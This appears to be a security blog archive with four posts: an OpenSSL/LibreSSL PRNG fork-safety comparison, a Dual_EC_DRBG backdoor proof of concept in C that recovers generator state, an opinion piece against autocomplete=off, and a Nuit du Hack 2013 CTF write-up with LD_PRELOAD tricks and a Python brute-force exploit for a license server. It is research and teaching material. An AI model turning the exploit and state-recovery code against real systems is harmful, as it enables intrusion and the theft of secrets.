OpenSSL and LibreSSL PRNG, what’s different?

openbsdhelpusIn July, a blog post from Andrew Ayer described the new, unsafe behaviour of portable LibreSSL 2.0.1. While it is right to say that it’s unsafe, it is still safer than baseline’s OpenSSL and portable LibreSSL 2.0.2. That’s what I’ll explain in this blog post.

OpenSSL

During March 2014, I released two CVE on OpenSSL consumers, stunnel (CVE-2014-0016) and libssh (CVE-2014-0017). I also wrote a paper about it in the french magazine MISC mag 74. Unfortunately the paper is in french and not yet released in CC-BY-NC, so here are the major points:

  • OpenSSL RAND_bytes() pool can be shared by two processes that are related, e.g. with a fork().
  • OpenSSL mitigates that problem by adding the result of getpid() in the entropy pool during a RAND_bytes() call. That means that two processes that share the same entropy pool and end up with the same PID will generate the same pseudorandom numbers.
  • That’s what happens in stunnel in fork mode: a master process initializes the entropy pool and spawns children. As children die, PID are recycled until a PID is reused and starts generating the same sequences of pseudorandom numbers.
  • Hopefuly OpenSSL uses RAND_seed() with the current unix time (time(NULL)) on every SSL handshake, so there’s only a one-second time spot to exploit that weakness, before having to start from scratch again. OSes with sequential PID generation are then less vulnerable than OSes with random PID (AFAIK only OpenBSD). This is because open OpenBSD it’s likely to have two different children have the same PID reused in the same second.
  • In the end, the exploit I wrote for it didn’t work, because the OpenSSL ECDSA_sign() function calls RAND_seed() with the content of the message to be signed, and the secret number k is different every time, mitigating the exploit:
  • int ECDSA_sign_ex(int type, const unsigned char *dgst, int dlen, unsigned char
        *sig, unsigned int *siglen, const BIGNUM *kinv, const BIGNUM *r,
        EC_KEY *eckey)
    {
        ECDSA_SIG *s;
        RAND_seed(dgst, dlen);
        s = ECDSA_do_sign_ex(dgst, dlen, kinv, r, eckey);
        if (s == NULL)
        {
            *siglen=0;
            return 0;
        }
        *siglen = i2d_ECDSA_SIG(s, &sig);
        ECDSA_SIG_free(s);
        return 1;
    }
    

I have written exploit code for it. It doesn’t manage to extract the private key (with OpenSSL) but detects when a PRNG collision happens. Now, that’s a weakness in OpenSSL that I suggested fixing with register_atfork(). It’s different in LibreSSL.

LibreSSL 2.0.1

Portable LibreSSL-2.0.1 is based on LibreSSL-2.0.1 that changed all that code to rely on the arc4random(). On Linux, this function works more or less the same than it did with OpenSSL, with an initialized entropy pool. We see the following properties:

  • fork() is detected by a change in pid (using getpid()). It is not stirred in the pool with RAND_add() and so it’s not possible for two children to share the same pool content. However as described by Ayer, a child may have the same PID as its grandfather and not detect the PID change.
  • RAND_add()/RAND_seed() was removed from the source code. It’s a no-op and references were removed everywhere in libssl and libcrypto. That includes the TLS session management and the ECDSA_sign() functions.

In order to test for the strength of LibreSSL against the CVE-2014-0016 bug, I compiled stunnel 4.56 on Linux with a little addition:

int getpid(){return 31337;}

The exploit worked like a charm because LibreSSL didn’t detect the pid change and reused the same entropy content on two sessions. This is of course a lab test, but I did the same with OpenSSL and couldn’t extract the private key because of the mitigations in ECDSA_sign():

ECDSA/DSA weakness

Without going too far in the mathematical details, it is important to know that both ECDSA and DSA rely on a random big integer, k, to do the signature operation. This number should be perfectly random and not reused, because its knowledge (or reuse) would balance the ECDSA/DSA equations and make the private key easy to calculate.
OpenSSL did RAND_add() on the actual message to be signed. Most likely, this message could be public, but it would be at least different on every attack. This simple RAND_add()/RAND_seed() made my exploit impossible as the value k would be chosen differently on every attack.
On the contrary, LibreSSL removed that statement. The developers decided that the only source of randomness should be the PRNG.
While I agree that having a strong PRNG is a requirement to do strong crypto, the choice of the secret value is a very well known weakness of ECDSA/DSA. DJB explains why they chose in ed25519 not to use RNG at all for the selection of k:

Avoiding RNGs in signatures. It would be better if the signature system didn’t need new randomness for each signature in the first place. The RNG would be used much less frequently, and could afford to be designed more conservatively. We wouldn’t have to worry about the RNG taking entropy from malicious sources. We could move a long-term secret key into a highly protected hardware device for signing, without having to pay for an RNG in the hardware device and without having to worry about the quality of that RNG. We could have test vectors for signing functions, because those functions wouldn’t have a hidden RNG input.

This is exactly what was accomplished by a very simple modification to DSA suggested by George Barwood in February 1997: namely, “a prng is used to generate k, keyed with d (the private key), and seeded with e (the message digest).” Essentially the same idea was suggested by John Wigley in March 1997: “Why not derive the random number from the message to be signed therefore removing the need for a hardware rng (smartcards) or a complex and potentially fallible software attempt. … 1)Hash the message to be signed as usual and use that as the message in the signature algorithm. 2)hash the private key using the chaining variable state left by the previous hash, and use that as the random number.”

I think LibreSSL should implement a workaround such as this one to protect ECDSA against problems just like the ones we discussed, and have the secret value K generated using a function of the PRNG output, message and private key. It probably wouldn’t pass FIPS certification, but who cares :)

LibreSSL 2.0.2

The LibreSSL team fixed that bug by using the register_atfork() function, that gets a callback called after every fork. This function is part of POSIX and is portable enough, and better, it ensures that every fork() is detected in the right way. This is not perfect (as wrote Andrew) and an explicit way to reset the entropy pool would be welcome.

Summary

This is a little summary of the different ways of handling fork() in the PRNG and ECDSA signatures as I discussed in the post:

name handling PID change DSA/ECDSA
OpenSSL RAND_add(getpid()) RAND_add(message); k=random()
portable LibreSSL 2.0.1 if(getpid()!=pid) reset() k=random()
portable LibreSSL 2.0.2 onfork() callback k=random()
My ideal onfork() callback k=hash(random() + privkey + message)

To end my point, I would say that the bug that was found is not as bad as it looks, mainly because OpenSSL had a much worse behavior for years and nobody ever complained. The way they solved it is the best I can think of, even though I think something should be done to protect the ECDSA and DSA signature process against future bugs in the PRNG.

To finish I still think it’s a little too soon to use portable LibreSSL in production, as OpenSSL was chopped down badly to fit into OpenBSD’s security model, and the portable LibreSSL team may not be aware of all the traps left in the port. The behaviour of rc4random() on Linux was one of them.

Dual_Ec_Drbg backdoor: a proof of concept

Dual_EC_DRBG backdoor: a proof of concept

What’s this ?

Dual_EC_DRBG is an pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as first source of randomness in their applications. edit: I’ve been told it’s not the case anymore in FIPS-140-2 but the cat is already out of the bag

If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading.
In 2007 already, Dan Shumow and Niels Ferguson from Microsoft showed that Dual_EC_DRBG algorithm could be backdoored. Twitter also uncovered recently that this algorithm was even patented in 2004 by Dan Brown (Not the Da Vinci guy, the Certicom one) as a “key escrow mechanism” (government jargon/lingo for trapdoor/backdoor).
I will go a little bit further in explaining how it works and give a proof-of-concept code, based on OpenSSL FIPS. This is in the best of my knowledge the only public proof of concept published today. (correct me if I’m wrong).

Dual_EC_DRBG in a nutshell

The PRNG works as following: it takes a seed that goes through a hashing algorithm. This data is then “fed” into two Elliptic Curve points, P and Q, before being slightly transformed and output.

In order to understand how the algorithm (and the backdoor) works, let’s see the relevant maths from Elliptic Curves:

Elliptic curves

Many types of elliptic curves exist. They are classified in function of their properties and equations. We’re going to see here the curve NIST-p256 which is one of the three curves being used by Dual_EC_DRBG. NIST-p384 and NIST-p521 have very similar characteristics. I’ll try to (poorly) give you the basic theoretics for EC, but I’m no mathematician. Please forgive me and correct me if I’m wrong.

A curve is a set of points that follow a group structure. The curve is defined over several parameters (for NIST GFp curves):

  • Equation: all the members of that group (called points) must satisfy this equation y^2 = x^3 + ax + b (mod p)
  • Prime modulus p: a prime number used to define the finite field Z/pZ in which the equation elements are defined.
  • The order r: this is the order of the EC and the total number of points into the group.
  • a and b: fixed integers used in curve’s equation. a is set to -3 in NIST GF(p) curves.
  • A Generator point defined by Gx and Gy: This point is considered as the base element of the group.

Curve members are points. A point is a pair of coordinates X and Y that satisfy the curve’s equation. They are written as capital letters such as G, P or Q. Points have some characteristics from groups:

  • They have an addition operation (+) defined between two points. (eg. P + Q).
  • This addition is commutative and associative.
  • Since you can add a point with itself as many time as you want, it has a scalar multiplication, which is the multiplication of a scalar (0..n) with a point and results in another point.
  • That scalar multiplication is associative/commutative (a(bP) = b(aP)).
  • This scalar should be in the group of integers modulo r (the order of the curve).

The group of Elliptic Curves is very useful in cryptography, because an equation such as iQ = P is very easy to resolve for Q or P (if you know i) but very hard to resolve for i (if all you know is P and Q). This is the Discrete logarithm problem in the EC group. That’s why most of the time the points are used as public parameters/keys and scalars as private counterparts.

All NIST curves have different parameters p, r, a, b and points G. These parameters have been constructed from a sha1 hash of a public seed but nobody knows how the seed itself has been chosen.

Enough on the theory, let’s study the PRNG !

Dual_EC_DRBG internals

Dual_EC_DRBG is defined in NIST SP800-90A page 60. It is an algorithm generating an infinite number of pseudo-random sequences from a single seed, taken in the first step or after an explicit reseed.
DUAL_EC_DRBG
It is unfortunate that SP800-90A and the presentation from Microsoft use conflicting terminology (variable names). So I will use these variables:
i_n: Internal seed value.
o_n: External (output) value.
You can also see in the document two functions: phi and x(). phi is a function that does a mapping between a large integer and binary data. It doesn’t do much, in fact we can happily ignore it. x(P) simply gets the X coordinate of a point, as the X and Y coordinates are mostly redundant (as we’re going to see later). If we unroll the inductive feedback loop on the first two generated outputs, we get this:

i_0 = randomseed()
i_1 = phi(x(i_0 P))
o_0 = phi(x(i_1 Q))
output(30 least significant bytes of o_0)
i_2 = phi(x(i_1 P))
o_1 = phi(x(i_2 Q))
output(30 least significant bytes of o_1)

An attack

Let’s begin working on o_0 and look if we can guess o_1 from its content. We can see that o_0 is the X coordinate of a point, with 16 bits missing (we lost the 2 most significant bytes in the output process). In a NIST GFp curve, There are for every value of X, zero, one or two points on the curve. So we have at most 17 bits of bruteforce to do to recover the original point A. Let’s work on the hypothesis that we know the point A and it is equal (by definition) to A = i_1 Q.

Then the equation:

i_1 Q = A
but if we have a (secret) relation between P and Q such as dQ = P with d = secret number (our backdoor !):
i_1 d Q = d A multiplicating each side by d
i_1 P = d A (replacing dQ with P)

If you look carefully at the unrolled algorithm, you will notice that if we know i_1 P we can calculate i_2 = phi(x(d A)) and we have all the required information to calculate subsequent o_1 ..o_n and i_2 ..i_n. All we need to do is to guess a value of A (based on a bruteforce approach), multiply it by the secret value d, then multiply the resulting scalar with Q, strip two bytes and publish the output. It is also very interesting that if we learn (in a practical attack) the first 32 bytes generated by this PRNG, the 30 first bytes give us candidates for A and the remaining two bytes can be used to validate our findings. If the X value had been output on 32 bytes, we would have an one over two chance of success because of the two coexisting points on same coordinate X. (Remember from high school, second degree equations can have two solutions).

Generating the constants

As you have seen before, for our backdoor to work we need to choose the P and Q points in order to have the secret key to the backdoor. We have chosen to define P = dQ, however, that can’t work, because P is a generator for the EC group and its value has already been fixed. So, we have to find a value e such as Q = eP. This value can be calculated :

P = dQ
eP = edQ (mult. by e)

We need to find a value e such as ed = 1 for the curve C. The equation to resolve is
ed = 1 (mod r) where r is the order of the EC.
The value of e is the inverse of d modulo r. We can then use that value to generate Q.

/* 256 bits value randomly generated */
unsigned char d[]=
    "\x75\x91\x67\x64\xbe\x30\xbe\x85\xd1\x50\x09\x19\x50\x8a\xf4\xb5"
    "\x7a\xc7\x09\x22\x07\x32\xae\x40\xac\x3e\xd5\xfe\x2e\x12\x25\x2a";
d_bn = BN_new();
assert(d_bn != NULL);

BN_bin2bn(d, 32, d_bn);
/* ensure d is well inside the group order */
EC_GROUP_get_order(curve, r, bn_ctx);
BN_mod(d_bn, d_bn, r, bn_ctx);
/* calculate Q = d * Generator + (NULL * NULL) */
ret = EC_POINT_mul(curve, my_Q, d_bn, NULL, NULL, bn_ctx);
assert(ret == 1);

/* calculate e = d^-1 (mod r) */
e_bn = BN_new();
assert(e_bn != NULL);

/* invert d to get the value of e */
assert(NULL != BN_mod_inverse(e_bn, d_bn, r, bn_ctx));

(note: I know I mixed up e with d between the code and blog post but that doesn’t change anything at all.)

Implementation

You can find the proof of concept code on my github. I’ll comment how it works:

Install OpenSSL/FIPS

Most of the work needed for this POC actually was fighting with OpenSSL FIPS mode (getting it to compile at first) and finding the good APIs to use. OpenSSL FIPS and OpenSSL are two different software that share some codebase. I had to fetch a specific commit of OpenSSL FIPS (one that would compile) and patch it a little to have a few functions from Bignums usable from inside my application. I haven’t been able to mix FIPS and regular libcrypto, because of header incompatibilities (or a bug in my code I though was caused by incompatibilities). The README explains the steps to take (please read it).

Recover point A

If you remember, we have the 30 least significant bytes of the X coordinate, that means we need to bruteforce our way into A point candidates. This can be easily done in a loop over the 2^16 possibilities. OpenSSL doesn’t provide any way of recovering a point from a single coordinate (there exists a point compression algorithm, but it is so badly patented that it’s not implemented anywhere). We have to resolve the curve’s equation:
y^2 = x^3 - 3x + b (mod p)
Resolving such an equation for y is not so different from the equation resolving you learned at high school:

for (prefix = 0; prefix <= 0x10000 ; ++prefix){
    x_bin[0] = prefix >> 8;
    x_bin[1] = prefix & 0xff;
    BN_bin2bn(x_bin, 32, x_value);
    //bnprint("X value", x_value);

    /* try to find y such as */
    /* y^2 = x^3 - 3x + b (mod p) */
    /* tmp1 = x^2 */
    ret = BN_mod_mul(tmp1, x_value, x_value, &curve->field, bn_ctx);
    assert(ret == 1);

    ret = BN_set_word(tmp2, 3);
    assert(ret == 1);

    /* tmp1 = x^2 - 3 */
    ret = BN_mod_sub(tmp1, tmp1, tmp2, &curve->field, bn_ctx);
    assert(ret == 1);

    /* tmp1 = (x^2 -3) * x */
    ret = BN_mod_mul(tmp1, x_value, tmp1, &curve->field, bn_ctx);
    assert(ret == 1);

    /* tmp1 = x^3 - 3x + b */
    ret = BN_mod_add(tmp1, tmp1, b_bn, &curve->field, bn_ctx);
    assert(ret == 1);

    //bnprint("Y squared", tmp1);
    if (NULL != BN_mod_sqrt(y_value, tmp1, &curve->field, bn_ctx)) {
        //printf("value %x match !\n", prefix);
        if(verbose)
            bnprint("calculated Y", y_value);

        BN_mod_sub(y_value, zero_value, y_value, &curve->field, bn_ctx);
        if(verbose)
            bnprint("calculated Y opposite", y_value);
        test_candidate(buffer + 30, x_value, y_value, bn_ctx);
        valid_points += 2;
    }
}

I mentioned that for every X, there were zero, one or two solutions: zero if the square root fails (not all elements of Z/pZ are quadratic residues), one if the result is 0 and two for all other answers. There are then two valid points (A_x, A_y) and (A_x, -A_y) where -A_y is the opposite of the first value modulo p. Explanation (thanks Rod):

y^2 = a^2
y^2 - a^2 = 0
(y-a) (y + a) = 0
y = a or y = -a

Recover PRNG state and generate next block

This part is pretty straightforward. We import the estimated x and y values, verify that they are in the curve (they should !), then multiply that point with the secret value. We then multiply Q with the resulting scalar and we get 30 bytes of the next output. If the two first bytes match, we have successfully guessed the 28 remaining bytes. That attack can recover everything that’s output by that PRNG till a reseed.

/* create the point A based on calculated coordinates x and y */
ret = EC_POINT_set_affine_coordinates_GFp(curve, point, x, y, bn_ctx);
assert(ret == 1);
/* Normally the point should be on curve but we never know */
if (!EC_POINT_is_on_curve(curve, point, bn_ctx))
    goto end;

/* calculates i2 = phi(x(e.A)) */
ret = EC_POINT_mul(curve, point, NULL, point, e_bn, bn_ctx);
assert(ret ==1);

ret = EC_POINT_get_affine_coordinates_GFp(curve, point, i2x, NULL, bn_ctx);
assert(ret ==1);
if(verbose)
    bnprint ("i2_x", i2x);

/* calculate o1 = phi(x(i2 * Q)) */
ret = EC_POINT_mul(curve, point, NULL, my_Q, i2x, bn_ctx);
assert(ret == 1);
ret = EC_POINT_get_affine_coordinates_GFp(curve, point, o1x, NULL, bn_ctx);
if(verbose)
    bnprint ("o1_x", o1x);
BN_bn2bin(o1x, o1x_bin);
if (o1x_bin[2] == buffer[0] && o1x_bin[3] == buffer[1]){
    printf("Found a match !\n");
    bnprint("A_x", x);
    bnprint("A_y", y);
    print_hex("prediction", o1x_bin + 4, 28);
}

Let’s run it !


aris@kalix86:~/dualec$ ./dual_ec_drbg_poc
s at start of generate:
E9B8FBCFCDC7BCB091D14A41A95AD68966AC18879ECC27519403B34231916485
[omitted: many output from openssl]
y coordinate at end of mul:
0663BC78276A258D2F422BE407F881AA51B8D2D82ECE31481DB69DFBC6C4D010
r in generate is:
96E8EBC0D507C39F3B5ED8C96E789CC3E6861E1DDFB9D4170D3D5FF68E242437
Random bits written:
000000000000000000000000000000000000000000000000000000000000
y coordinate at end of mul:
5F49D75753F59EA996774DD75E17D730051F93F6C4EB65951DED75A8FCD5D429
s in generate:
C64EAF10729061418EB280CCB288AD9D14707E005655FDD2277FC76EC173125E
[omitted: many output from openssl]
PRNG output: ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437449e
Found a match !
A_x: 96e8ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437
A_y: 0663bc78276a258d2f422be407f881aa51b8d2d82ece31481db69dfbc6c4d010
prediction: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3
Reviewed 65502 valid points (candidates for A)
PRNG output: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3

Yikes !

Conclusion

It is quite obvious in light of the recent revelations from Snowden that this weakness was introduced by purpose by the NSA. It is very elegant and leaks its complete internal state in only 32 bytes of output, which is very impressive knowing it takes 32 bytes of input as a seed. It is obviously complete madness to use the reference implementation from NIST and I’m not the only one to be angry about it. You could use it with custom P and Q values, but that’s very seldom possible. Nevertheless having a whole EC point parameter leaked in the output makes it too easy to distinguish from real random and should never have been made into any specs at all. Let’s all bury that PRNG and the “security” companies bribed by NSA to enable backdoors by default for thirty silver coins.

edits: fixed Dan Brown’s employer name, changed a variable name to avoid confusion, fixed counting error 28 bytes to 30 bytes
note: I did not break the official algorithm. I do not know the secret value used to compute the Q constant, and thus cannot break the default implementation. Only NSA (and people with access to the key) can exploit the PRNG weakness.
note2: Some questions were raised about the security of that secret value. The secret value I speak of is the scalar used to generate Q. As EC is a cyclicgroup, it is proven that for every P and Q there is a value such as eP = Q.
How long would it be to bruteforce that value ? Finding the value e is equivalent to resolving the discrete logarithm problem in NIST-p256. ANSSI tells that GF(p) 256 bits has the same security as a 128bits symmetric cipher encryption key. Keys up to 80 bits are believed to be impossible to crack today, so we can say it’s more likely to be stolen by an NSA employee than being cracked.

edit3: NIST-p256 is a cyclic group and that’s what makes the note2 relation possible
edit4: There’s an awesome video explaining elliptic curves and Dual-ec-drbg.

The war against autocomplete=off: let my browser remember passwords !

I noticed a while ago that many security professionals advise their customers to use ‘autocomplete=off’ in the password fields of login screens. It also started to scratch an itch on me when my password manager never stored passwords for a few websites. And I started to look for opinions before forging my own.

Websites advising to disable autocomplete

A few blogs, forum posts and even stackoverflow advise to disable autocomplete on password fields. Owasp.org itself advises to prevent web browsers from caching sensitive data in the client side.

What are the advantages of disabling autocomplete

The two main advantages for the security are the following:

  • Avoid caching sensitive data on client site (CC numbers)
  • Avoid storing the password in an insecure and hackable client-site database

The first bullet is in my opinion completely legitimate. Some information, like credit card numbers, should not be remembered in the web forms, because there is nothing that can let the browser understand that this field is sensitive, that its content should not be stored unencrypted on the hard drive and shown in plaintext at the first occasion when the user types a few digits in a text box (and be victim of shoulder eavesdropping). However passwords are different. They have their own class of input box and browsers know how to manage them. I will come to this later.

The second advantage of that policy is that passwords won’t be remembered in the case the user’s computer has been hacked. That’s true in a few occasions, like when the user has malware on his computer or his laptop gets lost/stolen. I would respond that no software password management solution can really help when the end user computer cannot be trusted. In many case, malware can just wait for the user to type his password to steal it. To efficiently protect against malware, users should be provided a physical device to be used to authenticate and sign any sensitive operation. That’s the only working mitigation in my opinion, we use these in Belgium for e-banking and it’s working pretty well.

Now, let’s get started with the cons of autocomplete=off

The most problematic drawback of autocomplete policies is that they interact badly with password managers. Password managers are in my opinion the best we can do to work around the inherent insecurity of passwords : don’t remember your password, let your password manager do it for you (and better. And without writing it down in plaintext). When you’re setting autocomplete=off, you’re effectively opting out of all the advantages password managers provide to users, and which are specifically designed to avoid some pitfalls, like the stolen laptop scenario.

The policy hard to change locally: the security policy is completely at the control of the server, which means users don’t control how they manage the security of their credentials, unless their password manager willingly override the autocomplete attributes.

A big issues is also the consequence on the security of passwords chosen by users for these services. Let’s say that you have to choose a password for a web service. This password:

  • Has to be >8 characters, including capitals, ciphers and special characters (i.e. hard to remember)
  • Cannot be stored on your computer or on paper for further reference (i.e. has to be remembered)
  • Cannot be shared with other websites
  • Must sometimes be written on embedded devices like a smartphone

Tell me how I am supposed to fulfill these requirements if I need 20 websites daily to do my work ? (my password manager has an hundred of entries). It’s simply impossible. As a consequence, users are going to work around this policy and either choose a very simple password, or a somewhat strong password that is the same on all services. The password manager permits the user to store secure password on a per-service basis. Breaking the password manager exposes the user to all the other behaviors. The lack of good web password managers on mobile platforms is also one of the reasons for poor passwords (no caps, special letters, ciphers) and password reuse on these devices.

Password managers protect against phishing. Don’t believe it ? Just go on a website (phishing site) that has nothing to do with the legitimate website, and you don’t see the password autocompleting itself. This should ring a bell even to inexperienced users. They may not even know the password, and having to add a few steps in order to get the password will probably put distance between the user and the fisher.

Please note that if you combine this policy and at the same time disable copy and paste into the password fields (I look at you, Blizzard!), I hate you. Your policy enforces weak passwords instead of promote them.

In conclusion/TL;DR

You may have understood it; my biggest problem against the autocomplete=off policies is that they break password managers, which in my opinion are the best tool we have to manage the hell that are passwords. By setting this parameter, you opt out of password management and force the user free to use less optimal management techniques like weak passwords or password sharing.
What to do ? Maybe promote password managers. Let the user decide on the password policy. Do not rely on passwords alone but use strong authentication with hardware devices. Update password managers to ignore autocomplete=off, which may be the case on a few password managers (I tested firefox sync and keepass, they don’t have that functionality).

I will happily read anything you may have to add to this, especially if I’m wrong.

Nuit Du Hack CTF 2013 : k1986 write-up

I’ve participed to NDH2013 this year and worked on a very interesting binary : k1986. It comes with two files :

aris@kali64:~/ndh2013$ ls -l k1986 license.db 
-rwxr-xr-x 1 aris aris 14984 jun 23 02:07 k1986
-rwx------ 1 aris aris   360 jun 22 22:54 license.db
aris@kali64:~/ndh2013$ file k1986-orig license.db 
k1986-orig: ELF 64-bit LSB executable, x86-64, invalid version (SYSV), for GNU/Linux 2.6.32, 
dynamically linked (uses shared libs), corrupted section header size
license.db: data

It’s starting well, corrupted ELF file. The content of license.db seems encrypted, so my first guess was that it was a DRM server of some kind. It becomes more fun when you try to check what it does:

aris@kali64:~/ndh2013$ objdump -t k1986-orig 
objdump: k1986-orig: File format not recognized
aris@kali64:~/ndh2013$ gdb --quiet ./k1986-orig 
"/home/aris/ndh2013/k1986-orig": not in executable format: Format de fichier non reconnu
(gdb) quit
aris@kali64:~/ndh2013$ nm ./k1986-orig 
nm: ./k1986-orig: File format not recognized
aris@kali64:~/ndh2013$ ldd ./k1986-orig 
	 n'est pas un exécutable dynamique

So all classic tools give up… but that’s ok, let’s gdb-attach the process..

aris@kali64:~/ndh2013$ gdb --quiet -p 23627
Attaching to process 23627
"/home/aris/ndh2013/k1986": not in executable format: Format de fichier non reconnu
(gdb) info reg 
eax            0xfffffe00	-512
ecx            0xffffffff	-1
edx            0x5c4c	23628
ebx            0x18a70700	413599488
esp            0xf9154780	0xf9154780
ebp            0xf91547e8	0xf91547e8
esi            0x0	0
edi            0x18a709d0	413600208
eip            0x18e02e75	0x18e02e75
eflags         0x246	[ PF ZF IF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) x/i $eip
=> 0x18e02e75:	Cannot access memory at address 0x18e02e75
(gdb) x/$ $rip
A syntax error in expression, near `$rip'.
(gdb)

That’s the real fun. No matter what I did to that binary, I never managed to make gdb attach to it in 64 bits mode. I tried to make the binary unreadable (chmod 100) or to patch the missing fields/sections but it did not good. I lost too much time on this one (btw if you managed to make gdb work on this, I’d appreciate a lot).
Time to launch IDA. We discover a dynamically loadable executable that’s linked to libpthread and libc. Since the section header table is broken, IDA was not able to match the PLT and GOT entries with that of the binary. However it was smart enough to see a list of exports. We see very classic things for such a binary (open, socket, bind, listen, accept, read, write, close, printf, …) and other more unusual (pthread_mutex_lock). At which point I freaked out it would be a very hard to understand multithreaded program, as I had no debugger yet.
When having no symbols, you have to recognize the PLT and GOT by yourself. As I couldn’t simply gdb into the process to make it do the symbol resolutions for me, I took another approach and used the RTLD capabilities of rewriting symbols:

$ cat intercept.c
#include 

int bind(){
  void **i;
  i = &i;
  printf("bind: %p\n",i[2]);
  exit(0);
}

$ gcc -fPIC -shared -o intercept.so intercept.c && LD_PRELOAD=./intercept.so ./k1986
bind: xxxxxx

img1

This gave me the return addresses of many libc functions, and I was able to rename the PLT entries according to them. from that moment, reversing the binary was piece of cake, if we except the many anti-debugger patterns found into the code. I only removed the patterns at the places that made the local variables resolutions hard for IDA when it was important to me. Go ahead, 0×90 all that crap !

img2

Now I wanted to understand how the binary worked and what really happened with the multithreading. Details apart, there’s only one lock and its only purpose is to avoid fork(). Now, I found a very interesting snippet: In function compare_input_3 (which was, as you’re going to see, something else), we can see that the data we give in goes in many loops. The most interesting thing is that we initialize a local buffer of 256 bytes with values 00, 01, 02, 03, … If you are familiar with cryptography, you’d recognize it’s the first step of an RC4 key setup. The key is being set in an other function and is statically set at 0x4023ae : “90 3F 8E 7F 8A”. Let’s give it a try:

img3

>>> rc4.WikipediaARC4("903F8E7F8A".decode("hex")).crypt("\x00"*256).encode("hex")
'8fd94d70a9ce04bb7ba97fdd632d238e52bcdc0bab8bd9f0f7055e6084e76347fec2ce9910c7aaccac65b2c8f8c36
ee0d9cdaaa3f657173152a6580b468f91e91120c1384ec4210c564c7732e6bf80bbd35ccc9cd8fc1d9e44a425a85fc
bfa96f746c0582b135bce5ca5a40be48eecdee6310fe7f10a3d775abf26c0b7610ed841ecd3d6aa691f8689981e43c
c6b95822e3f632747aef16f5c1b25c611db3fa7e9348f96e1d9665963b3e01eb7e367986f413e6fe12dead33718542
32caac84f2f4c37448f9aa300fee983cbf4b6adb7405f5bf5cf9bc60ef3c2f550b2ad5fbe7275a2fadac0c627d490e
7c54389f4479726b835cd6c4503bc1d8706337a05aa'

So everything you send is going to be XOR’ed with this value. Now, let’s see what’s happening with that data when it’s decrypted:
img4
We can see that for every byte that is received, something like this happens:

input[0] + input[0] == 0x9c
input[1] << 2 == 0x10
input[2] << 3 == 0x40
input[3] << 4 == 0xa0
value =  atoi (&input[4])
input[6] << 3 == 0xd0
read_license (value, &input[7]);

I noticed the license key was encrypted, and also that read_license was doing operations with malloc/free. I though there was a cheap occasion to avoid using the debugger and instrumenting one of the functions by myself:

$ cat intercept.c
#include 

int (*fct)(int, char *);
char buffer[256];
char buffer2[256];
int socket(){
	fct = (void *)0x401cf2;
	fct(1,"Hello");
	write(1,buffer,256);
	write(1,buffer2,256);
	exit(0);
} 
int free(char *ptr){
	if(ptr == 0)
		return;
	printf("free %s\n",ptr);
	write(1,ptr,256);
}
char *malloc(int s){
	printf("Malloc\n");
	static int a = 0;
	if (a)
		return buffer2;
	++a;
	return buffer;
}

aris@kali64:~/ndh2013$ LD_PRELOAD=./intercept.so ./k1986
Malloc
Malloc
$*O~I*IpH..xL}J+{,+O)-|N/MysFtN}/*+M}H.L}Eu/IyIxL-,.rDsDNwNtFuMx{I~HxH})L~NwO,}|E'C%{K|vGp
JzBq Fut'Dt%yMzIqEq&'us+'+xN{H,$vN+"!CrK{H.'.O*|vFsIqr#wwCvsFO~)K)J/(MtuDN|LvE}H~xH+
I+&$wFwDvCz(JrA%,!+)$64:e17cc98f772d417a3ce261df512c2ab4
52:3f45067f05fb180b8f0014a23648d677
99:2385ba276005a5e2098c0acb9bdf8f07
17:083d5f3bcd7c0b39e473844f1326decf
46:840c653d087e8e1821b1903f0981ae2d
05:8efc22fcc45fc5901f1bbce521f29bc1
20:3856bd0cbb94460c113259b0b83d9049

I found an easy way to dump the content of the key file. The two ciphers code on the left must be the value parsed by atoi, and the one on the right must be the right value. Doing so tentatives shows that the server is going to tell you if your encrypted input matches the begin of the token from the list. The exploit follows. (also on pastebin with a better presentation).

#!/usr/bin/python
# Exploit for k1984
# Aris Adamantiadis (les pas contents)
# unfortunately coded a few hours after the CTF was over :(
# aris@kali64:~/ndh2013$ python xp.py 
# found 05:8efc22fcc45fc5901f1bbce521f29bc1
# found 06:98adbaaef36e718f479db3b8dad331c9
# found 13:7da8b66f82aeba067e33859583c4153f
# found 17:083d5f3bcd7c0b39e473844f1326decf
# found 20:3856bd0cbb94460c113259b0b83d9049
# found 35:167f0dbb43c6430cd2d3b4e8f79dd769
# found 46:840c653d087e8e1821b1903f0981ae2d
# found 52:3f45067f05fb180b8f0014a23648d677
# found 64:e17cc98f772d417a3ce261df512c2ab4
# found 99:2385ba276005a5e2098c0acb9bdf8f07

import socket

crypted = "8f d9 4d 70 a9 ce 04 bb 7b a9 7f dd 63 2d 23 8e" + \
"52 bc dc 0b ab 8b d9 f0 f7 05 5e 60 84 e7 63 47" + \
"fe c2 ce 99 10 c7 aa cc ac 65 b2 c8 f8 c3 6e e0" + \
"d9 cd aa a3 f6 57 17 31 52 a6 58 0b 46 8f 91 e9" + \
"11 20 c1 38 4e c4 21 0c 56 4c 77 32 e6 bf 80 bb" + \
"d3 5c cc 9c d8 fc 1d 9e 44 a4 25 a8 5f cb fa 96"
crypted = crypted.replace(" ","").decode("hex")
def xor_strings(xs, ys):
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))

offset = 65
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)
s.connect(("127.0.0.1",2001))

def try_pass(offset, string):
	payload = chr(0x9C /2) + chr(0x10/4) + chr(0x40/8) + chr(0xa0 / 16) +\
		chr(ord('0') + offset/10) + chr(ord('0') + offset % 10) + chr(0xd0 / 8) +\
		string + "\x00"
	s.send(xor_strings(payload,crypted))
	x = s.recv(256)
	#print "recv:" + x
	if(x.find("True")!= -1):
		return True
	else:
		return False

for offset in xrange(100):
	string = ""
	for i in xrange(32):
		if (i>0 and len(string)==0):
			break;
		for c in xrange(16):
			x = try_pass(offset, string + "%x"%c)
			if x:
				string += "%x"%c
				#print string
				break
	if(len(string) > 0):
		print "found %.2d:"%offset + string

